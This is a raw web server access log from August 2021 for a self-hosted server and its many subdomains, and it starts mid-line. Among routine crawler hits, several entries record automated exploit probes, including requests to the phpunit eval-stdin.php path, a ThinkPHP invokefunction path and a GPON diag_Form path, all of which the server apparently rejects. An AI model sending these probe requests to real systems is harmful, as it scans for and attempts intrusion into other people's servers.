x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Aug/2021:22:56:38 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.215.230] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Aug/2021:23:06:14 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 46.101.127.27] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [04/Aug/2021:23:53:37 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:23:53:37 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:23:53:39 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [04/Aug/2021:23:53:40 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:23:53:40 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:23:53:43 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:23:53:43 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:23:53:46 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:23:53:47 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:23:53:49 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:23:53:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Aug/2021:00:22:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.218.13] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Aug/2021:02:09:03 +0000] 444 - GET https agent.moralanimal.net "/" [Client 138.197.101.133] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:02:45:26 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Aug/2021:02:45:26 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Aug/2021:04:20:56 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [05/Aug/2021:04:31:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.70] [Length 0] [Gzip -] "-" "-" [05/Aug/2021:06:07:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.220.79] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Aug/2021:06:35:17 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [05/Aug/2021:07:30:34 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Aug/2021:07:30:35 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Aug/2021:07:47:20 +0000] 400 - GET http localhost "/ab2g" [Client 159.65.229.240] [Length 154] [Gzip -] "-" "-" [05/Aug/2021:07:47:20 +0000] 400 - GET http localhost "/ab2h" [Client 159.65.229.240] [Length 154] [Gzip -] "-" "-" [05/Aug/2021:07:47:24 +0000] 400 - - http localhost "-" [Client 159.65.229.240] [Length 154] [Gzip -] "-" "-" [05/Aug/2021:07:48:11 +0000] 400 - GET http localhost "/" [Client 61.219.11.153] [Length 154] [Gzip -] "-" "-" [05/Aug/2021:07:48:37 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.227.134.79] [Length 0] [Gzip -] "curl/7.3.2" "-" [05/Aug/2021:09:36:55 +0000] 444 - GET https agent.moralanimal.net "/" [Client 42.193.23.126] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:09:37:01 +0000] 444 - GET https agent.moralanimal.net "/" [Client 42.193.23.126] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:09:37:07 +0000] 444 - GET https agent.moralanimal.net "/" [Client 42.193.23.126] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:10:01:28 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.220.39] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Aug/2021:10:42:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Aug/2021:11:39:49 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 121.5.145.96] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:11:39:55 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 121.5.145.96] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:11:40:01 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 121.5.145.96] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:11:45:31 +0000] 400 - HEAD http localhost "/" [Client 143.244.142.94] [Length 0] [Gzip -] "-" "-" [05/Aug/2021:11:45:32 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 143.244.142.94] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Aug/2021:11:45:33 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 143.244.142.94] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Aug/2021:11:45:33 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 143.244.142.94] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Aug/2021:11:45:34 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 143.244.142.94] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Aug/2021:11:45:34 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 143.244.142.94] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Aug/2021:11:45:35 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 143.244.142.94] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Aug/2021:11:45:36 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 143.244.142.94] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Aug/2021:11:45:36 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 143.244.142.94] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Aug/2021:11:45:37 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 143.244.142.94] [Length 252] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [05/Aug/2021:11:45:38 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 143.244.142.94] [Length 0] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [05/Aug/2021:11:45:38 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 143.244.142.94] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Aug/2021:11:45:39 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 143.244.142.94] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Aug/2021:11:49:29 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 121.5.145.96] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:11:49:35 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 121.5.145.96] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:11:49:41 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 121.5.145.96] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:12:08:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.156.91.182] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [05/Aug/2021:12:08:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.156.91.182] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [05/Aug/2021:12:08:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.156.91.182] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [05/Aug/2021:12:08:52 +0000] 400 - GET http 64.22.31.253 "/" [Client 103.156.91.182] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [05/Aug/2021:12:08:52 +0000] 400 - GET http 64.22.31.253 "/" [Client 103.156.91.182] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [05/Aug/2021:12:08:52 +0000] 400 - GET http 64.22.31.253 "/" [Client 103.156.91.182] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [05/Aug/2021:15:17:46 +0000] 444 - GET https io.moralanimal.net "/" [Client 42.192.17.155] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:15:17:52 +0000] 444 - GET https io.moralanimal.net "/" [Client 42.192.17.155] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:16:03:06 +0000] 444 - GET https komga.moralanimal.net "/" [Client 212.129.152.41] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:16:03:12 +0000] 444 - GET https komga.moralanimal.net "/" [Client 212.129.152.41] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:16:06:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 46.101.56.5] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36" "-" [05/Aug/2021:16:12:03 +0000] 444 - GET https komga.moralanimal.net "/" [Client 212.129.152.41] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:16:12:09 +0000] 444 - GET https komga.moralanimal.net "/" [Client 212.129.152.41] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:16:12:15 +0000] 444 - GET https komga.moralanimal.net "/" [Client 212.129.152.41] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:16:34:00 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 167.99.57.108] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:16:38:07 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 143.198.12.17] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:16:41:07 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.209.190] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Aug/2021:16:49:30 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 164.90.143.13] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:16:53:11 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 42.192.184.76] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:16:53:17 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 42.192.184.76] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:17:01:59 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.216.247] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Aug/2021:17:06:12 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 42.192.184.76] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [05/Aug/2021:17:12:28 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.220.166] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Aug/2021:17:16:03 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 104.131.14.252] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:17:21:16 +0000] 444 - GET https router.moralanimal.net "/" [Client 164.90.134.9] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:17:21:36 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 68.183.51.250] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:17:32:02 +0000] 444 - GET https oauth.moralanimal.net "/" [Client 165.227.126.166] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:17:39:54 +0000] 444 - GET https komga.moralanimal.net "/" [Client 164.90.138.159] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:17:43:02 +0000] 444 - GET https home.moralanimal.net "/" [Client 161.35.185.121] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:17:47:20 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [05/Aug/2021:17:47:22 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Aug/2021:17:47:23 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Aug/2021:17:47:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Aug/2021:17:47:25 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Aug/2021:17:47:27 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Aug/2021:17:47:29 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Aug/2021:17:47:29 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Aug/2021:17:47:31 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Aug/2021:17:47:32 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Aug/2021:17:47:34 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Aug/2021:17:48:58 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 45.55.52.249] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:18:03:14 +0000] 444 - GET https opds.moralanimal.net "/" [Client 164.90.135.215] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:18:09:52 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 167.71.240.75] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:18:11:32 +0000] 444 - GET https io.moralanimal.net "/" [Client 159.203.165.109] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:18:19:13 +0000] 444 - GET https sql.moralanimal.net "/" [Client 142.93.77.149] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:18:19:18 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 164.90.135.52] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Aug/2021:20:06:52 +0000] 444 - POST https 64.22.31.253 "/t3" [Client 212.41.22.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" "-" [05/Aug/2021:20:36:25 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10" "-" [05/Aug/2021:20:36:25 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14" "-" [05/Aug/2021:20:36:26 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [05/Aug/2021:21:15:47 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Aug/2021:21:15:47 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Aug/2021:21:15:47 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Aug/2021:21:15:47 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Aug/2021:21:15:47 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Aug/2021:21:15:47 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 